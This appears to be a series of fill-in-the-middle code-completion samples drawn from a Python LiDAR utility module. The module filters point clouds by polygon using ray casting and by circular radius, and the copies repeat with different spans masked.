inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
<|fim_middle|>
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]) |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
<|fim_middle|>
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)]) |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
<|fim_middle|>
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:] |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
<|fim_middle|>
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
<|fim_middle|>
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon) |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
<|fim_middle|>
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | print("\t\t\t no points in polygon") |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
<|fim_middle|>
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:] |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
